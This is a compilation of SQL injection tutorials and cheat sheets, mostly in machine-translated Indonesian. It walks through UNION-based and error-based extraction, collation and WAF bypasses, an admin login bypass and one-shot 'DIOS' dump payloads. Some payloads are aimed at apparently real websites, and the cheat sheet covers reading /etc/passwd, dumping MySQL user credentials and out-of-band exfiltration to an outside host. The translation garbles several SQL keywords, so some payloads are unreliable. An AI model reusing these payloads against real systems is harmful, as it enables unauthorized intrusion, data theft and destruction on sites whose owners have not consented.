2175Kolom tidak dikenal '7' di 'pesanan klausa'
2176
2177Berarti Ada Total 6 Jumlah Kolom.
2178
2179Memungkinkan Jalankan UNION BASED Query kami.
2180
2181http://www.TARGET.com/product.php?id=35 dan 0 Union SELECT 1,2,3,4,5,6-- -
2182
2183Setelah mengeksekusi UNION BASED Query, kami Punya Kesalahan.
2184
2185Kesalahan fatal: Ukuran memori yang diizinkan sebesar 536870912 byte habis (mencoba mengalokasikan 534511572 byte) di /home/XXXX/public_html/cat_ver_producto.php pada baris 166
2186
2187Masalahnya adalah dengan Memori PHP Server. Kami Akan menggunakan Nilai NULL daripada menempatkan Kolom Nomor di sana untuk Memotong Server Penggunaan Memori PHP untuk Query SQL kami.
2188
2189Setelah Menempatkan nilai NULL, Kueri Kita Akan Jadi.
2190http://www.TARGET.com/product.php?id=35 dan 0 Union SELECT null, null, null, null, null, null-- -
2191
2192Sekarang ERROR GONE !!
2193
2194Karena kami menggunakan Null Values, kami tidak tahu Kolom mana yang Rentan. Jadi untuk menemukan Kolom yang Rentan, Kita Berikan Perintah Versi () satu per satu di setiap Kolom sampai Memberi Kita Hasil Apapun.
2195
2196http://www.TARGET.com/product.php?id=35 dan 0 versi PILIH Union (), null, null, null, null, null-- -
2197
2198Setelah mengecek Kolom pertama selanjutnya Periksa Yang Lain dan kemudian Lain lagi sampai kami Mendapat Hasilnya. Dengan Cara Ini kami Akan Memeriksa Semua Kolom dan Akan Menemukan Kolom Yang Rentan.
2199
2200Ketika kami akan menemukan Kolom yang Rentan kami, maka kami dapat menempatkan Permintaan kami untuk Tabel dan Kolom di Kolom yang rentan itu.
2201jika Anda Tidak Tahu Bagaimana Mendapatkan Tabel Dan Kolom Kemudian.
2202
2203-h
2204
2205
2206Memotong Mix of Collations yang ilegal - Tutorial
2207Dengan suntik pikiran
2208Hanya 4 no0b seperti saya
2209Dalam Tutorial ini Anda Akan Mempelajari Cara Melepaskan Campuran Kolasi ilegal.
2210Mari kita mulai dengan injeksi SQL Reguler kami.
2211Target kami.
2212http://www.Site.com/detail.php?id=31
2213Pertama kita harus Hitung Berapa Banyak Kolom yang dimilikinya.
2214http://www.Site.com/detail.php?id=31 pesanan oleh 1-- -
2215Tidak Ada Kesalahan!
2216http://www.Site.com/detail.php?id=31 pesanan oleh 4-- -
2217Tidak Ada Kesalahan!
2218http://www.Site.com/detail.php?id=31 pesanan sebesar 6-- -
2219Kami Punya Kesalahan Di Sini.
2220Kolom Tidak Diketahui '6' di 'pesanan oleh'
2221Memungkinkan Mengurangi Jumlah Kolom.
2222http://www.Site.com/detail.php?id=31 pesanan sebesar 5-- -
2223Tidak Ada Kesalahan!
2224Ada 5 Kolom jadi ayo Siapkan UNION SELECT Command dan Cari Kolom yang Rentan.
2225http://www.Site.com/detail.php?id=31 dan 0 Union Select 1,2,3,4,5-- -
2226Kami Punya 2 dan 3.
2227Mari mencoba untuk Dapatkan The Tables.
2228http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, concat (table_name), 3,4,5 dari information_schema.tables di mana table_schema = database () - -
2229Ooops !! kami mendapat Kesalahan Di Sini.
2230Campuran ilegal dari kolasi untuk operasi 'UNION'
2231Berikut Beberapa Metode yang dapat kita gunakan untuk Melewatkan campuran ilegal dari pengumpulan untuk operasi 'UNION'
2232.1 Menggunakan UNCOMPRESS (COMPRESS (our_query_here))
2233http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, uncompress (kompres (concat (table_name))), 3,4,5 dari information_schema.tables di mana table_schema = database () - - -
2234DIKECEPATAN !!
2235.2 Menggunakan UNHEX (HEX (our_query_here))
2236http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, unhex (hex (concat (table_name))), 3,4,5 dari information_schema.tables di mana table_schema = database () - - -
2237DIKECEPATAN !!
2238.3 Menggunakan CAST ()
2239http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, cast (table_name sebagai binary), 3,4,5 dari information_schema.tables di mana table_schema = database () - -
2240DIKECEPATAN !!
2241.4 Menggunakan CONVERT ()
2242http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, konversikan (table_name menggunakan ascii), 3,4,5 dari information_schema.tables di mana table_schema = database () - -
2243DIKECEPATAN !!
2244BEBERAPA METODE ADVANCE untuk CONVERT ()
2245Dalam CONVERT () Fungsi jika ascii tidak berfungsi maka kita dapat menggunakan Fungsi ini sebagai ganti ascii.
2246ujis
2247ucs2
2248tis620
2249swe7
2250sjis
2251macroman
2252macce
2253latin7
2254latin5
2255latin2
2256koi8u
2257koi8r
2258keybcs2
2259hp8
2260geostd8
2261gbk
2262gb2132
2263armscii8
2264ascii
2265cp1250
2266big5
2267cp1251
2268cp1256
2269cp1257
2270cp850
2271cp852
2272cp866
2273cp932
2274dec8
2275euckr
2276latin1
2277Semoga ini akan membantu Anda di masa depan
2278
2279Terima kasih untuk saudara tutorialnya: *
2280
2281-h
2282
2283
2284filtered Requested
2285# tables #
2286group_concat(/*!table_name*/)
2287+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
2288
2289or
2290
2291/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
2292
2293or
2294
2295/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
2296
2297Union Select bypass
2298
2299&id=10 %26%26 NULL union/**/DistinctRow select 1,2-- -
2300&id=@ Or 1<0 union/**/DistinctRow select 1,2-- -
2301&id=@<0union/**/DistinctRow select 1,2-- -
2302
2303QUERY RESUME ? :D
2304Version:
2305SELECT VERSION()
2306SELECT @@version
2307SELECT @@version_comment
2308SELECT @@version_compile_machine
2309SELECT @@version_compile_os
2310Directories:
2311SELECT @@basedir
2312SELECT @@tmpdir
2313SELECT @@datadir
2314Users:
2315SELECT USER()
2316SELECT SYSTEM_USER()
2317SELECT SESSION_USER()
2318SELECT CURRENT_USER()
2319Current Database:
2320SELECT DATABASE()
2321Concatenation:
2322SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
2323SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Retu
2324Multi-Concat:
2325#Stacks the row "foo" from the table "bar" together, using the separa
2326#Note: This operation can by default only grab 1024 bytes, and do no
2327#The 1024 byte limit is stored in the @@group_concat_max_len variabl
2328SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar
2329Better-Concat:
2330#CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROU
2331#Which therefor allows you to concat strings together up to the @@ma
2332#instead of @@group_concat_max_len. The default value for @@max_allo
2333#1048576 bytes, instead of @@group_concat_max_len's 1024.
2334SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name
2335Change Collation:
2336SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from
2337SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.
2338Wildcards in SELECT(s):
2339SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) st
2340SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) en
2341Regular Expression in SELECT(s):
2342#Returns all columns matching the regular expression.
2343SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'
2344SELECT Without Dublicates:
2345SELECT DISTINCT foo FROM bar
2346Counting Columns:
2347SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from t
2348Get Amount of MySQL Users:
2349SELECT COUNT(user) FROM mysql.user
2350Get MySQL Users:
2351SELECT user FROM mysql.user
2352Get MySQL User Privileges:
2353SELECT grantee,privilege_type,is_grantable FROM information_schema.us
2354Get MySQL User Privileges on Different Databases:
2355SELECT grantee,table_schema,privilege_type FROM information_schema.sc
2356Get MySQL User Privileges on Different Columns:
2357SELECT table_schema,table_name,column_name,privilege_type FROM infor
2358Get MySQL User Credentials & Privileges:
2359SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Upd
2360Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,
2361File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_p
2362Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_
2363Repl_client_priv) FROM mysql.user
2364Get MySQL DBA Accounts:
2365SELECT grantee,privilege_type,is_grantable FROM information_schema.us
2366SELECT host,user FROM mysql.user WHERE Super_priv='Y'
2367Get Databases:
2368SELECT schema_name FROM information_schema.schemata
2369SELECT DISTINCT db FROM mysql.db
2370SELECT DISTINCT table_schema FROM information_schema.columns
2371SELECT DISTINCT table_schema FROM information_schema.tables
2372Get Databases & Tables:
2373SELECT table_schema,table_name FROM information_schema.tables
2374SELECT DISTINCT table_schema,table_name FROM information_schema.colu
2375Get Databases, Tables & Columns:
2376SELECT table_schema,table_name,column_name FROM information_schema.c
2377SELECT A Certain Row:
2378SELECT foo FROM bar LIMIT 0,1; #Returns row 0.
2379SELECT foo FROM bar LIMIT 1,1; #Returns row 1.
2380...
2381SELECT foo FROM bar LIMIT N,1; #Returns row N.
2382Benchmark (Heavy Query):
2383#Performs an MD5 calculation of "1" for 10000 times.
2384SELECT BENCHMARK(10000,MD5(1))
2385Sleep:
2386#Works only in MySQL 5 and above.
2387#Sleeps for 5 seconds, returns 0 on success.
2388SELECT SLEEP(5)
2389Conversion (Casting):
2390SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1
2391SELECT CAST('65' AS CHAR); #Returns: A
2392Substring:
2393SELECT SUBSTR('foobar',1,3); #Returns: foo
2394Hexadecimal Evasion:
2395SELECT 0x41424344; #Returns: ABCD
2396SELECT 0x2E; #Returns: .
2397SELECT 0x3A; #Returns: :
2398ASCII to Number:
2399SELECT ASCII('A'); #Returns: 65
2400Number to ASCII:
2401SELECT CHAR(65); #Returns: A
2402SELECT CHAR(89); #Returns: Y
2403SELECT CHAR(116,101,115,116); #Returns: test
2404If Statement:
2405#Returns 1 if the database is running MySQL 5.
2406SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);
2407#Returns 1 if the database is running MySQL 4.
2408SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);
2409Case Statement:
2410#Returns 1 if the database is running MySQL 5.
2411SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END
2412#Returns 1 if the database is running MySQL 4.
2413SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END
2414Read File(s):
2415#Requires you to have the File_priv in mysql.user. On error this stat
2416SELECT LOAD_FILE('/etc/passwd')
2417Write File(s):
2418#You must use quotes on the filename!
2419SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
2420SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hel
2421Logical Operator(s):
2422AND, &&; #The AND operator have && as an alternative syntax.
2423OR, ||; #The OR operator have || as an alternative syntax.
2424NOT, !; #The NOT operator have ! as an alternative syntax.
2425XOR; #The XOR operator got no alternative syntax.
2426Fuzzy Code Comment:
2427#Code within /*! are getting executed by MySQL. Additional /*! can be
2428SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/
2429Comments:
2430SELECT foo, bar FROM foo.bar-- Single line comment
2431SELECT foo, bar FROM foo.bar/* Multi line comment */
2432SELECT foo, bar FROM foo.bar# Single line comment
2433SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-
2434A few evasions/methods to use between your MySQL statements:
2435CR (%0D); #Carrier Return.
2436LF (%0A); #Line Feed.
2437Tab (%09); #The Tab-key.
2438Space (%20); #Most commonly used. You know what a space is.
2439Multiline Comment (/**/); #Well, as the name says.
2440Fuzzy Comment (/*!); #Be sure to end your query with (*/)
2441Parenthesis, ( and ); #Can also be used as separators when used right
2442Parenthesis instead of space:
2443#As said two lines above, the use of parenthesis can be used as a sep
2444SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))
2445Auto-Casting to Right Collation:
2446SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s)
2447DNS Requests (OOB (Out-Of-Band)):
2448#For more information check this.
2449SELECT YourQuery INTO OUTFILE ‘\\\\www.your.host.com\\?file_to_save_a
2450Command Execution:
2451#If you're on a MySQL 4.X server, it's possible to execute OS comman
2452#It can be done if you're able to upload a shared object into /usr/
2453#The file extension is .so, and it must contain an "User Defined Fun
2454#Get raptor_udf.c, it's the source-code for just that feature.
2455#Remember to compile it for the right CPU Architecture.
2456#The CPU architecture can be resolved by this query:
2457SELECT @@version_machine;
2458<blockquote>A couple of useful blind queries to fingerprint the data
2459All of these return either True or False, as in, you either get a res
2460SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53;
2461SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52
2462Running as root:
2463SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=U
2464Got File_priv:
2465SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user
2466(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
2467(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
2468(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
2469LIMIT 0,1)=CHAR(89),1,0)=1
2470Got Super_priv (Are we DBA):
2471SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql
2472(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
2473(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
2474(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
2475LIMIT 0,1)=CHAR(89),1,0)=1
2476Can MySQL Sleep:
2477#This query will return True and should take above 1 second to execut
2478SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1
2479Can MySQL Benchmark:
2480SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1
2481Are we on *NIX:
2482SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47
2483Are we on Windows:
2484SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=
2485Do a certain column exist:
2486SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information
2487Do a certain table exist:
2488SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
2489SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
2490Do a certain database exist:
2491SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
2492SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
2493SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information
2494SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db
2495from:h.ackack(dot)net
2496
2497Credits to owner :*
2498thanks
2499
2500INJEKSI MSSQL MENGGUNAKAN KONVERSI
2501
2502Kita mendapat target dan mari kita periksa apakah itu Rentan untuk disuntikkan. Jadi kita akan Jalankan URL dengan Menambahkan Kutipan Tunggal "'" di Akhir Jika Parameter Target.
2503http://www.Vuln-Site.com/authorprofile.asp?id=46 '
2504Ini Memberi Kita Kesalahan
2505
2506KESALAHAN:
2507Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e14'
2508[Microsoft] [ODBC SQL Server Driver] [SQL Server] Tanda kutip uncomposed setelah string karakter ''.
2509/authorprofile.asp, baris 10
2510
2511Situs Target kami adalah Rentan. Seperti kita Suntik dengan Serangan Konversikan Jadi kita tidak perlu Pergi Untuk Menghitung Jumlah Kolom Total. Kami akan langsung mengeksekusi Perintah kami dengan Konversi.
2512Mari Periksa Versi.
2513http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = konversi (int, @@ version) -
2514Setelah Melaksanakan Permintaan Kami Mendapat Versi.
2515
2516Berikut ini adalah Versi: Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Hak cipta (c) Microsoft Corporation Web Edition (64-bit) pada Windows NT 6.1 <X64> (Build 7601: Paket Layanan 1 )
2517Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e07'
2518[Microsoft] [ODBC SQL Server Driver] [SQL Server] Konversi gagal saat mengkonversi nilai nvarchar 'Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Hak Cipta (c) Microsoft Corporation Web Edition (64 -bit) pada Windows NT 6.1 <X64> (Build 7601: Service Pack 1) 'ke tipe data int.
2519/authorprofile.asp, baris 10
2520
2521Sekarang, mari kita periksa nama database saat ini.
2522http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = konversi (int, db_name ()) -
2523Dan kami sudah mendapat nama database saat ini.
2524
2525Ini adalah Nama Database Saat Ini: museindia
2526Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e07'
2527[Microsoft] [ODBC SQL Server Driver] [SQL Server] Konversi gagal ketika mengkonversi nilai nvarchar 'museindia' ke tipe data int.
2528/authorprofile.asp, baris 10
2529
2530Seperti yang telah kita dapatkan Versi dan nama Database. Sekarang, mari kita pindah ke Getting The Tables.
2531Ini adalah pertanyaan kami untuk mendapatkan tabel.
2532http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = convert (int, (pilih top 1 table_name dari information_schema.tables)) - +
2533Setelah Melaksanakan Kueri, Kita Mendapat Nama Tabel Pertama.
2534
2535Nama tabel: tentang
2536Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e07'
2537[Microsoft] [ODBC SQL Server Driver] [SQL Server] Konversi gagal ketika mengkonversi nilai nvarchar 'about' ke int tipe data.
2538/authorprofile.asp, baris 10
2539Untuk Mendapatkan Tabel Lain dari Database, kita akan menambahkan nama Tabel Sebelumnya Terlampir Dengan Kutipan Tunggal dengan Tanda Kecil.
2540Sebagai contoh:
2541dan 1 = convert (int, (pilih top 1 table_name dari information_schema.tables di mana table_name tidak di ('OUR_PREVIOUS_TABLE_NAME_1', 'OUR_PREVIOUS_TABLE_NAME_2'))) - +
2542Jadi Mari Periksa Tabel Lainnya dari Basis Data.
2543http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = convert (int, (pilih top 1 table_name dari information_schema.tables di mana table_name tidak di ('about'))) - +
2544Dan Kami Punya Nama Meja Berikutnya.
2545
2546Nama Tabel Berikutnya: aucon
2547Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e07'
2548[Microsoft] [ODBC SQL Server Driver] [SQL Server] Konversi gagal ketika mengkonversi nilai nvarchar 'aucon' ke tipe data int.
2549/authorprofile.asp, baris 10
2550Dengan cara ini kita akan Terus Mendapatkan tabel Lainnya sampai mendapatkan Tabel yang Diperlukan.
2551Di sini kita Mendapat nama Tabel: anggota
2552Sekarang mari Dapatkan nama Kolom dari Tabel ini.
2553http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = convert (int, (pilih top 1 column_name dari information_schema.columns di mana table_name = 'members')) - +
2554kami telah mendapat nama Kolom Pertama.
2555
2556Ini adalah First Column Name: memberid
2557Mari mencoba mendapatkan Kolom lainnya seperti yang kita lakukan untuk mendapatkan tabel lain dari database.
2558
2559http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = convert (int, (pilih top 1 column_name dari information_schema.columns di mana table_name = 'members' dan column_name tidak di ('memberid') )) - +
2560Jadi Setelah Mendapatkan nama Kolom Bagian Terakhir adalah Untuk Mengekstrak Data dari Kolom.
2561Ini akan menjadi Pertanyaan Akhir Kita!
2562http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = konversi (int, (pilih top 1 OUR_COLUMN_NAME _DI SINI dari OUR_TABLE_NAME_HERE)) - +
2563Kueri ini akan Mencetak Data dari Kolom di WebPage.
2564
2565-h
2566
2567Mem-bypass Login Panel dengan SQL Queries
2568
2569http://trentglobal.com/admin
2570
2571Kita dapat menggunakan Live HTTP Headers atau Hackbar untuk Post Parameters Injection jadi saya akan Menggunakan Hackbar Untuk Proses ini.
2572Sekarang Mari Sisipkan Beberapa Teks dalam kotak nama pengguna dan kata sandi. Setelah Memasukkan Teks Klik pada Tombol LOGIN. Kemudian Aktifkan Data Posting di Hackbar untuk Pelaksanaan Parameter Posting Kita.
2573
2574Sekarang Klik LOAD URL Button di Hackbar untuk mendapatkan Parameter POST dalam kotak POST DATA di Hackbar Addon. Di sana kami akan memberikan pertanyaan SQL Injection.
2575
2576Ini memberi kami Nama Pengguna dan Kata Sandi yang tidak valid tetapi Anda dapat Melihat Data Pos di Addon Peretasan.
2577Berikut adalah Parameter Posting Kami uname = harhar & pwd = 123456 & log_submit = Login
2578ayo tambahkan Single Quote setelah uname = harhar 'untuk memeriksa kerentanan SQLi. Dan kemudian Execute the Query.
2579
2580Ini Rawan terhadap SQL Injection. Selanjutnya kita akan mengeksekusi Query SQL Berbasis STRING untuk Penyuntikan Lebih Lanjut.
2581Sekarang Mari Hitung berapa Banyak Kolom yang ada.
2582Jadi Kami akan Berikan Perintah Kami Untuk menghitung Kolom di Parameter Pasca dengan Hackbar.
2583order uname = harharharhar sebesar 2% 23
2584No Error !!
2585
2586uname = 'pesanan sebesar 3% 23
2587No Error !!
2588
2589order uname = harhar 'sebesar 4% 23
2590No Error !!
2591
2592uname = 'pesanan sebesar 5% 23
2593
2594Kami Punya Kesalahan !! Kolom tidak dikenal '5' di 'klausa pesanan'
2595Berarti Ada 4 Jumlah Kolom Total.
2596Hmmm Sekarang Mari Jalankan perintah UNION SELECT kami dengan 4 jumlah Kolom.
2597
2598BinGOOOO !! Panel Admin Dilewati. Kita sudah mendapat Akses ke Panel Admin Tanpa menggunakan Nama Pengguna atau Kata Sandi dari pengguna Admin.
2599
2600-h
2601Playing with DIOS #1
2602
2603task & rules
2604¤display version with your name
2605¤display count how many column names start with characters id_
2606¤display list of columns (with their database and table name) where column names start with characters id_
2607
2608Solution:
2609
2610http:p//vuln.net/produit.ph p?id=55 and 0 UNION%0aSELECT 1,2,3,concat(0x3c2f7469746c653e,version(),0x203a3a2050682e683472683472,0x3c42523e,0x6e756d626572206f6620636f6c756d6e73207374617274696e6720776974682069645f2069733a20,count(*),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and((column_name)like(0x69645f25))and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2d2d3e,table_name,0x2d2d3e,column_name))))x),0x3c7469746c653e),5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23 from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f73 6368656d61)and(column_name)like(0x69645f25)--
2611
2612©MasterAjkaro
2613-h
2614
2615Playing with DIOS #2
2616
2617Task & rules
2618¤display version with your name
2619¤display total number of databases
2620¤display total number of tables (without those in information_schema)
2621¤display all table names (excluding those from information_schema) and columns count for each table
2622
2623solution......
2624
2625http://www.vuln.fr/pages /produit.php?id=55 and 0 UNION SELECT 1,2,3,4,5,6,7,8,9,concat(0x3c62723e,version(),0x3a3a2050682e683472683472,0x3c62723e746f74616c206e756d626572206f66206461746162617365733a20,(select count(*) %0Afrom information_schema.schemata),
26260x3c62723e746f74616c206e756d626572206f66207461626c657320696e206461746162617365732028776974686f757420696e666f726d6174696f6e5f736368656d61293a20,(select count(*) %0afrom information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61),
2627(select(@x)%0afrom(select(@x:=0x00),(select(0)%0afrom(information_schema.tables)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in
2628(@x:=concat(@x,0x3c62723e,0x7461626c653a20,@tbl:=table_name,
26290x202d2d3e20636f6c756d6e733a20,(select(count(*))%0Afrom(information_schema.columns)where(table_name=@tbl))x)
2630),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- -
2631
2632©Master Akjkaro
2633~h
2634
2635Playing with DIOS #3
2636
2637Task & rules
2638¤display version with your name
2639¤display all tables in primary database with records count for each table
2640
2641solution....
2642
2643http://www.vuln.com /product.php?c=11) and 0 UNION SELECT 1,concat
2644(version(),0x50682e683472683472,(select (@x) from (select (@x:=0x00),(select(0)from(information_schema.tables)where(table_schema=database()) and (0x00) in
2645(@x:=concat(@x,0x3c62723e,@tbl:=table_name,0x202d2d3e207265636f72647320696e207461626c653a20,(select table_rows from information_schema.tables where table_schema=Database() and table_name=@tbl))x)),3,4,5,6,7,8
2646
2647©Master Ajkaro
2648-h
2649
2650MSSQL DIOS
2651
2652¤1¤
2653==========================
2654http://www.aiou.edu.pk/Programmes.asp?PID=74;begin declare @x varchar(8000),@y int,@z varchar(50),@a varchar(100) declare @myTbl table (name varchar(8000) not null)SET @y=1 SET @x='injected by Me :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl)select @a=@a %2b column_name%2b' : '
2655from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2bCHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%
26562b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)SET @y = @y%2b1 end select @x as output into diosku END--
2657
2658¤2¤
2659==========================
2660http://www.aiou.edu.pk/Programmes.asp?PID=74%20and%200%3D1%20UNION%20SELECT%2b1%2Coutput%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%20from%20diosku--
2661
2662¤3¤
2663==========================
2664http://www.aiou.edu.pk/Programmes.asp?PID=74;DROP TABLE diosku--
2665
2666==========================
2667©securityidiots
2668-rkx
2669
2670The Error Connection Was Reset
2671
2672Query :
2673
2674id=.1union-- a%0Aselect
2675id=1-.1union- a%0Aselect
2676id=1'e0union- a%0Aselect
2677id=\Nunion- a%0Aselect
2678id=1 *9e0union-- -%0aselect
2679
2680Please Like and Share our Page :*
2681
2682-h
2683
2684Hari ini saya akan menunjukkan kepada Anda cara mem-bypass Web Application Firewalls (WAF). Saya akan mendemonstrasikan dari Teknik-Teknik Dasar dan Paling Sederhana ke yang Paling Mahir!
2685
2686CATATAN: Jika Anda tidak tahu SQL Injection, baca ini dulu ...
2687
2688Apa itu WAF?
2689
2690WAF adalah singkatan dari Firewall Aplikasi Web. Hal ini banyak digunakan saat ini untuk mendeteksi dan mempertahankan Suntikan SQL!
2691
2692Mari kita mulai!
2693
2694Bagaimana cara mengetahui apakah Firewall Aplikasi Web?
2695
2696Ini sangat sederhana! Ketika Anda mencoba memasukkan perintah yang digunakan untuk SQL Injections (biasanya perintah "UNION SELECT"), Anda mendapatkan 403 Error (dan situs web mengatakan "Forbidden" atau "Tidak Dapat Diterima").
2697Contoh:
2698
2699http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….
2700(Kami mendapatkan kesalahan 403!)
2701Metode Dasar / Sederhana:
2702
2703Pertama, tentu saja, kita perlu mengetahui Metode Dasar untuk mem-bypass WAF…
2704
27051) Komentar:
2706Anda dapat menggunakan komentar untuk mem-bypass WAF:
2707
2708http://www.site.com/index.php?page_id=-15 / *! UNION * / / *! SELECT * / 1,2,3,4….
2709(Metode Pertama yang Dapat Menembus WAF)
2710
2711Namun, sebagian besar WAF mengidentifikasi metode ini sehingga mereka masih menunjukkan "Forbidden" Error…
2712
27132) Ubah Kasus Huruf:
2714Anda juga dapat mengubah Kasus Perintah:
2715
2716http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
2717(Metode Dasar Lain untuk Menghindari WAF!)
2718
2719Namun, seperti sebelumnya, trik ini juga terdeteksi oleh kebanyakan WAF!
2720
27213) Gabungkan Metode sebelumnya:
2722Yang dapat Anda lakukan adalah menggabungkan dua metode sebelumnya:
2723
2724http://www.site.com/index.php?page_id=-15 / *! uNIOn * / / *! SelECt * / 1,2,3,4….
2725
2726Metode ini tidak dapat dideteksi oleh banyak Firewall Aplikasi Web!
27274) Kata Kunci yang Diganti:
2728Beberapa Firewall menghapus Pernyataan "UNION SELECT" ketika ditemukan di URL ... Kita dapat melakukan ini untuk mengeksploitasi fungsi ini:
2729
2730http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
2731(The "union" dan "select" akan dihapus, jadi hasil akhirnya adalah: "UNION SELECT")
2732
2733Metode ini tidak berfungsi di SEMUA Firewall, karena hanya sebagian dari mereka yang menghapus perintah "UNION" dan "SELECT" saat terdeteksi!
27345) Komentar Sejajar:
2735Beberapa firewall dilewati dengan Memasukkan Inline Komentar antara "Union" dan "Pilih" Perintah:
2736
2737http://www.site.com/index.php?page_id=-15% 55nION / ** /% 53ElecT 1,2,3,4…
2738(The% 55 sama dengan "U" dan% 53 sampai "S". Lihat lebih lanjut di Bagian Lanjutan ....)
2739
2740Saya percaya bahwa ini adalah metode paling dasar untuk WAF Bypassing! Mari kita lanjutkan dengan yang lebih maju ...
